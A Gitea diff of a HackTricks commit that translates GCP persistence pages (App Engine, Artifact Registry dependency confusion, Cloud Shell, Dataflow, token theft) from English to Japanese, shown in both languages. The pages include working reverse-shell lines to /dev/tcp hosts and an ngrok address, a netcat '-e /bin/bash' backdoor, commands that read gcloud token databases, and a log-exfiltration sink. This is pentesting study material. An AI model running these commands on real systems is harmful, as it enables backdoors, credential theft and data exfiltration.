gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-27 23:34:32 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:16:19 +00:00
parent 7770a50092
commit ea3a11546a
244 changed files with 8714 additions and 11561 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
src/pentesting-cloud/gcp-security/gcp-persistence/README.md
View File

@@ -1,6 +1 @@
# GCP - Persistence
# GCP - 永続性

12
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
View File

@@ -2,24 +2,20 @@
{{#include ../../../banners/hacktricks-training.md}}
## API Keys
## API キー
For more information about API Keys check:
API キーに関する詳細情報は、以下を確認してください:
{{#ref}}
../gcp-services/gcp-api-keys-enum.md
{{#endref}}
### Create new / Access existing ones
### 新しいものを作成する / 既存のものにアクセスする
Check how to do this in:
これを行う方法は、以下を確認してください:
{{#ref}}
../gcp-privilege-escalation/gcp-apikeys-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

14
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
View File

@@ -4,22 +4,18 @@
## App Engine
For more information about App Engine check:
App Engineに関する詳細情報は、以下を確認してください
{{#ref}}
../gcp-services/gcp-app-engine-enum.md
{{#endref}}
### Modify code
### コードの変更
If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence.
実行中のバージョンのコードを変更するか、新しいものを作成できれば、バックドアを実行させて持続性を維持できます。
### Old version persistence
### 古いバージョンの持続性
**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**.
**ウェブアプリケーションのすべてのバージョンが実行されます**。App Engineプロジェクトが複数のバージョンを実行していることがわかった場合、**バックドア**コードを含む**新しいバージョンを作成**し、その後**新しい正当な**バージョンを作成することで、最後のものが正当なものとなりますが、**バックドアが仕込まれたものも実行され続けます**。
{{#include ../../../banners/hacktricks-training.md}}

44
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
View File

@@ -1,46 +1,42 @@
# GCP - Artifact Registry Persistence
# GCP - アーティファクト レジストリの永続性
{{#include ../../../banners/hacktricks-training.md}}
## Artifact Registry
## アーティファクト レジストリ
For more information about Artifact Registry check:
アーティファクト レジストリに関する詳細情報は、以下を確認してください:
{{#ref}}
../gcp-services/gcp-artifact-registry-enum.md
{{#endref}}
### Dependency Confusion
### 依存関係の混乱
- What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both?
- The one with the **highest priority set in the virtual repository** is used
- If the **priority is the same**:
- If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used
- If not, the **highest version** is used
- **リモートと標準**のリポジトリが**仮想**リポジトリで**混在**し、パッケージが両方に存在する場合、どうなりますか?
- **仮想リポジトリ**で**優先度が最も高く設定された**ものが使用されます
- **優先度が同じ**の場合:
- **バージョン**が**同じ**であれば、**仮想リポジトリ**で**アルファベット順に最初のポリシー名**が使用されます
- そうでない場合は、**最も高いバージョン**が使用されます
> [!CAUTION]
> Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority
> したがって、リモートリポジトリがより高いまたは同じ優先度を持っている場合、**公開パッケージレジストリ**で**最高バージョン(依存関係の混乱)**を**悪用**することが可能です
This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version.
この技術は、**永続性**と**認証されていないアクセス**に役立ちます。悪用するには、アーティファクト レジストリに保存されている**ライブラリ名**を**知っている**必要があり、**同じライブラリを公開リポジトリ例えばPythonのPyPiに**より高いバージョンで**作成**するだけです。
For persistence these are the steps you need to follow:
永続性のために従うべき手順は次のとおりです:
- **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used.
- Create a remote repository if it doesn't exist
- Add the remote repository to the virtual repository
- Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\
Run something like:
- [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
- Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours!
- **要件**: **仮想リポジトリ**が**存在**し、使用されている必要があります。**公開リポジトリ**に存在しない**名前**の**内部パッケージ**を使用する必要があります。
- リモートリポジトリが存在しない場合は作成します
- リモートリポジトリを仮想リポジトリに追加します
- リモートリポジトリに**より高い(または同じ)優先度**を与えるために、仮想レジストリのポリシーを編集します。\
次のようなコマンドを実行します:
- [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
- 正当なパッケージをダウンロードし、悪意のあるコードを追加して、同じバージョンで公開リポジトリに登録します。開発者がインストールするたびに、彼はあなたのものをインストールします!
For more information about dependency confusion check:
依存関係の混乱に関する詳細情報は、以下を確認してください:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/dependency-confusion
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

10
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
View File

@@ -4,22 +4,18 @@
## BigQuery
For more information about BigQuery check:
BigQueryに関する詳細情報は以下を確認してください
{{#ref}}
../gcp-services/gcp-bigquery-enum.md
{{#endref}}
### Grant further access
### さらなるアクセスの付与
Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page:
侵害されたユーザーや外部ユーザーに対して、データセット、テーブル、行、列へのさらなるアクセスを付与します。必要な権限とその方法については、以下のページを確認してください:
{{#ref}}
../gcp-privilege-escalation/gcp-bigquery-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
View File

@@ -4,7 +4,7 @@
## Cloud Functions
For more info about Cloud Functions check:
Cloud Functionsに関する詳細情報は、以下を確認してください
{{#ref}}
../gcp-services/gcp-cloud-functions-enum.md
@@ -12,12 +12,8 @@ For more info about Cloud Functions check:
### Persistence Techniques
- **Modify the code** of the Cloud Function, even just the `requirements.txt`
- **Allow anyone** to call a vulnerable Cloud Function or a backdoor one
- **Trigger** a Cloud Function when something happens to infect something
- **Cloud Functionのコードを変更する**、たとえ`requirements.txt`だけでも
- **誰でも**脆弱なCloud FunctionやバックドアのCloud Functionを呼び出せるようにする
- **何かが起こったときに**Cloud Functionをトリガーして何かを感染させる
{{#include ../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
View File

@@ -4,26 +4,22 @@
## Cloud Run
For more information about Cloud Run check:
Cloud Runに関する詳細情報は、以下を確認してください
{{#ref}}
../gcp-services/gcp-cloud-run-enum.md
{{#endref}}
### Backdoored Revision
### バックドア付きリビジョン
Create a new backdoored revision of a Run Service and split some traffic to it.
Run Serviceの新しいバックドア付きリビジョンを作成し、一部のトラフィックをそれに分割します。
### Publicly Accessible Service
### 公開アクセス可能なサービス
Make a Service publicly accessible
サービスを公開アクセス可能にします。
### Backdoored Service or Job
### バックドア付きサービスまたはジョブ
Create a backdoored Service or Job
バックドア付きサービスまたはジョブを作成します。
{{#include ../../../banners/hacktricks-training.md}}

48
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
View File

@@ -4,7 +4,7 @@
## Cloud Shell
For more information check:
詳細については、次を確認してください:
{{#ref}}
../gcp-services/gcp-cloud-shell-enum.md
@@ -12,62 +12,52 @@ For more information check:
### Persistent Backdoor
[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
[**Google Cloud Shell**](https://cloud.google.com/shell/) は、関連するコストなしにブラウザから直接クラウドリソースへのコマンドラインアクセスを提供します。
You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
**ウェブコンソール**から、または**`gcloud cloud-shell ssh`**を実行することでGoogleのCloud Shellにアクセスできます。
This console has some interesting capabilities for attackers:
このコンソールには攻撃者にとって興味深い機能があります:
1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
3. There is **no capabilities for an organisation to monitor** the activity of that instance.
This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
1. **Google Cloudにアクセスできる任意のGoogleユーザー**は、完全に認証されたCloud Shellインスタンスにアクセスできますサービスアカウントも、組織のオーナーであってもアクセス可能です
2. そのインスタンスは**活動がない場合、少なくとも120日間はホームディレクトリを維持します**。
3. そのインスタンスの活動を**組織が監視する能力はありません**。
これは基本的に、攻撃者がユーザーのホームディレクトリにバックドアを設置でき、ユーザーが少なくとも120日ごとにGC Shellに接続する限り、バックドアは生き残り、攻撃者は実行するたびにシェルを取得できることを意味します。
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
ホームフォルダには、**`.customize_environment`** という別のファイルがあり、存在する場合はユーザーが **cloud shell** にアクセスするたびに **実行されます**前の技術と同様に。前のバックドアや、以下のようなものを挿入して、ユーザーが「頻繁に」cloud shell を使用している限り、持続性を維持します:
```bash
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
```
> [!WARNING]
> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
> **認証を必要とするアクションが最初に実行されるとき**、ユーザーのブラウザにポップアップ認証ウィンドウが表示されることに注意することが重要です。このウィンドウは、コマンドを実行する前に受け入れられなければなりません。予期しないポップアップが表示されると、疑念を引き起こし、使用されている永続性の方法が危険にさらされる可能性があります。
This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
これは、クラウドシェルから `gcloud projects list` を実行したときのポップアップ(攻撃者として)で、ブラウザのユーザーセッションで表示されます:
<figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
ただし、ユーザーがクラウドシェルを積極的に使用している場合、ポップアップは表示されず、**ユーザーのトークンを収集することができます**
```bash
gcloud auth print-access-token
gcloud auth application-default print-access-token
```
#### SSH接続の確立方法
#### How the SSH connection is stablished
基本的に、これらの3つのAPI呼び出しが使用されます
Basically, these 3 API calls are used:
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (ローカルで作成した公開鍵を追加します)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (インスタンスを起動します)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (Google Cloud ShellのIPを教えてくれます)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
さらに詳しい情報は、[https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)で見つけることができます。
But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
## References
## 参考文献
- [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
- [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
- [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
View File

@@ -4,38 +4,34 @@
## Cloud SQL
For more information about Cloud SQL check:
Cloud SQLに関する詳細情報は、以下を確認してください
{{#ref}}
../gcp-services/gcp-cloud-sql-enum.md
{{#endref}}
### Expose the database and whitelist your IP address
### データベースを公開し、IPアドレスをホワイトリストに追加する
A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\
For more information check the technique in:
内部VPCからのみアクセス可能なデータベースは外部に公開でき、あなたのIPアドレスをホワイトリストに追加することでアクセスできます。\
詳細情報は、以下のテクニックを確認してください:
{{#ref}}
../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
{{#endref}}
### Create a new user / Update users password / Get password of a user
### 新しいユーザーを作成する / ユーザーのパスワードを更新する / ユーザーのパスワードを取得する
To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\
Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\
Remember that **it's possible to list the users of a database** using GCP API.
データベースに接続するには、**データベースによって公開されたポートへのアクセス**と**ユーザー名**、**パスワード**が**必要です**。十分な権限があれば、**新しいユーザーを作成**したり、既存のユーザーの**パスワードを更新**したりできます。\
別のオプションは、いくつかのパスワードを試すことによって**ユーザーのパスワードをブルートフォースする**か、データベース内のユーザーの**ハッシュ化された**パスワードにアクセスしてそれを解読することです(可能な場合)。\
**GCP APIを使用してデータベースのユーザーをリストすることが可能であることを忘れないでください**
> [!NOTE]
> You can create/update users using GCP API or from inside the databae if you have enough permissions.
> 十分な権限があれば、GCP APIを使用するか、データベース内からユーザーを作成/更新できます。
For more information check the technique in:
詳細情報は、以下のテクニックを確認してください:
{{#ref}}
../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
View File

@@ -1,23 +1,19 @@
# GCP - Compute Persistence
# GCP - コンピュートの持続性
{{#include ../../../banners/hacktricks-training.md}}
## Compute
## コンピュート
For more informatoin about Compute and VPC (Networking) check:
コンピュートとVPCネットワーキングに関する詳細情報は、以下を確認してください
{{#ref}}
../gcp-services/gcp-compute-instances-enum/
{{#endref}}
### Persistence abusing Instances & backups
### インスタンスとバックアップの持続性の悪用
- Backdoor existing VMs
- Backdoor disk images and snapshots creating new versions
- Create new accessible instance with a privileged SA
- 既存のVMにバックドアを仕掛ける
- 新しいバージョンを作成するディスクイメージとスナップショットにバックドアを仕掛ける
- 特権SAを持つ新しいアクセス可能なインスタンスを作成する
{{#include ../../../banners/hacktricks-training.md}}

46
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
View File

@@ -4,10 +4,9 @@
## Dataflow
### Invisible persistence in built container
Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
### ビルドされたコンテナ内の見えない永続性
[**ドキュメントからのチュートリアル**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates)に従って、新しいpythonフレックステンプレートを作成できます
```bash
git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
cd python-docs-samples/dataflow/flex-templates/getting_started
@@ -19,39 +18,32 @@ gcloud storage buckets create gs://$REPOSITORY
# Create artifact storage
export NAME_ARTIFACT=flex-example-python
gcloud artifacts repositories create $NAME_ARTIFACT \
--repository-format=docker \
--location=us-central1
--repository-format=docker \
--location=us-central1
gcloud auth configure-docker us-central1-docker.pkg.dev
# Create template
export NAME_TEMPLATE=flex-template
gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
--image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
--sdk-language "PYTHON" \
--flex-template-base-image "PYTHON3" \
--metadata-file "metadata.json" \
--py-path "." \
--env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
--env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
--env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
--env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
--region=us-central1
--image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
--sdk-language "PYTHON" \
--flex-template-base-image "PYTHON3" \
--metadata-file "metadata.json" \
--py-path "." \
--env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
--env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
--env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
--env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
--region=us-central1
```
**ビルド中に、リバースシェルを取得します**前の例のように環境変数やDockerファイルを実行するための他のパラメータを悪用することができます。この時点で、リバースシェル内で**`/template`ディレクトリに移動し、実行されるメインのPythonスクリプトのコードを修正することが可能ですこの例では`getting_started.py`です)**。ここにバックドアを設定しておくと、ジョブが実行されるたびにそれが実行されます。
**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
Then, next time the job is executed, the compromised container built will be run:
次に、ジョブが実行されると、コンプロマイズされたコンテナが実行されます:
```bash
# Run template
gcloud dataflow $NAME_TEMPLATE run testing \
--template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
--parameters=output="gs://$REPOSITORY/out" \
--region=us-central1
--template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
--parameters=output="gs://$REPOSITORY/out" \
--region=us-central1
```
{{#include ../../../banners/hacktricks-training.md}}

10
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
View File

@@ -4,22 +4,18 @@
## Filestore
For more information about Filestore check:
Filestoreに関する詳細情報は以下を確認してください:
{{#ref}}
../gcp-services/gcp-filestore-enum.md
{{#endref}}
### Give broader access and privileges over a mount
### マウントに対するより広範なアクセスと権限を付与する
An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page:
攻撃者は**自分自身により多くの権限を与え、共有へのアクセスを容易にする**ことで、共有に対する持続性を維持することができます。このアクションを実行する方法はこのページで確認してください:
{{#ref}}
gcp-filestore-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
View File

@@ -2,9 +2,9 @@
{{#include ../../../banners/hacktricks-training.md}}
## Logging
## ロギング
Find more information about Logging in:
ロギングに関する詳細情報は以下を参照してください:
{{#ref}}
../gcp-services/gcp-logging-enum.md
@@ -12,14 +12,8 @@ Find more information about Logging in:
### `logging.sinks.create`
Create a sink to exfiltrate the logs to an attackers accessible destination:
攻撃者がアクセス可能な宛先にログを外部に送信するためのシンクを作成します:
```bash
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
```
{{#include ../../../banners/hacktricks-training.md}}

78
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
View File

@@ -1,74 +1,61 @@
# GCP - Token Persistance
# GCP - トークン持続性
{{#include ../../../banners/hacktricks-training.md}}
### Authenticated User Tokens
To get the **current token** of a user you can run:
### 認証されたユーザートークン
ユーザーの**現在のトークン**を取得するには、次のコマンドを実行できます:
```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```
Check in this page how to **directly use this token using gcloud**:
このページで**gcloudを使用してこのトークンを直接使用する方法**を確認してください:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1
{{#endref}}
To get the details to **generate a new access token** run:
**新しいアクセストークンを生成する**ための詳細を取得するには、次を実行します:
```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```
**`$HOME/.config/gcloud/application_default_credentials.json`** および **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`** にリフレッシュトークンを見つけることも可能です。
It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
To get a new refreshed access token with the **refresh token**, client ID, and client secret run:
**リフレッシュトークン**、クライアントID、およびクライアントシークレットを使用して新しいアクセストークンを取得するには、次のコマンドを実行します:
```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
The refresh tokens validity can be managed in **Admin** > **Security** > **Google Cloud session control**, and by default it's set to 16h although it can be set to never expire:
リフレッシュトークンの有効性は **Admin** > **Security** > **Google Cloud session control** で管理でき、デフォルトでは16時間に設定されていますが、期限が切れないように設定することもできます
<figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
### Auth flow
The authentication flow when using something like `gcloud auth login` will open a prompt in the browser and after accepting all the scopes the browser will send a request such as this one to the http port open by the tool:
`gcloud auth login` のようなものを使用する際の認証フローは、ブラウザでプロンプトを開き、すべてのスコープを受け入れた後、ブラウザはツールによって開かれたhttpポートにこのようなリクエストを送信します
```
/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1
```
Then, gcloud will use the state and code with a some hardcoded `client_id` (`32555940559.apps.googleusercontent.com`) and **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) to get the **final refresh token data**.
その後、gcloudは状態とコードを使用して、いくつかのハードコーディングされた `client_id` (`32555940559.apps.googleusercontent.com`) と **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) を使って **最終的なリフレッシュトークンデータ** を取得します。
> [!CAUTION]
> Note that the communication with localhost is in HTTP, so it it's possible to intercept the data to get a refresh token, however this data is valid just 1 time, so this would be useless, it's easier to just read the refresh token from the file.
> localhostとの通信はHTTPで行われるため、リフレッシュトークンを取得するためにデータを傍受することが可能ですが、このデータは1回だけ有効であるため、無駄になります。ファイルからリフレッシュトークンを読む方が簡単です。
### OAuth Scopes
You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing:
### OAuthスコープ
すべてのGoogleスコープは [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) で見つけることができます。または、次のコマンドを実行して取得できます:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
```
It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script:
このスクリプトを使用すると、**`gcloud`** が認証に使用するアプリケーションがサポートできるスコープを確認できます:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done
```
After executing it it was checked that this app supports these scopes:
実行後、このアプリがこれらのスコープをサポートしていることが確認されました:
```
https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
@@ -78,31 +65,26 @@ https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email
```
興味深いのは、このアプリが**`drive`**スコープをサポートしていることで、攻撃者がユーザーにこのスコープでトークンを生成させることに成功すれば、GCPからWorkspaceにエスカレートできる可能性があることです。
it's interesting to see how this app supports the **`drive`** scope, which could allow a user to escalate from GCP to Workspace if an attacker manages to force the user to generate a token with this scope.
**この方法を** [**ここで悪用する方法を確認してください**](../gcp-to-workspace-pivoting/#abusing-gcloud)**。**
**Check how to** [**abuse this here**](../gcp-to-workspace-pivoting/#abusing-gcloud)**.**
### サービスアカウント
### Service Accounts
認証されたユーザーと同様に、サービスアカウントの**プライベートキーのファイルを侵害することができれば、通常は好きなだけ**アクセスすることができます。\
しかし、サービスアカウントの**OAuthトークンを盗むことができれば、さらに興味深いことになります。デフォルトではこれらのトークンは通常1時間だけ有効ですが、**もし**被害者がプライベートAPIキーを削除した場合、OAuthトークンは期限が切れるまで有効です**。
Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\
However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private api key, the OAuh token will still be valid until it expires**.
### メタデータ
### Metadata
明らかに、GCP環境で実行されているマシン内にいる限り、**メタデータエンドポイントに連絡することで、そのマシンに付随するサービスアカウントにアクセスできます**このエンドポイントでアクセスできるOAuthトークンは通常スコープによって制限されていることに注意してください
Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes).
### 修正策
### Remediations
これらの技術に対するいくつかの修正策は、[https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)で説明されています。
Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
### References
### 参考文献
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
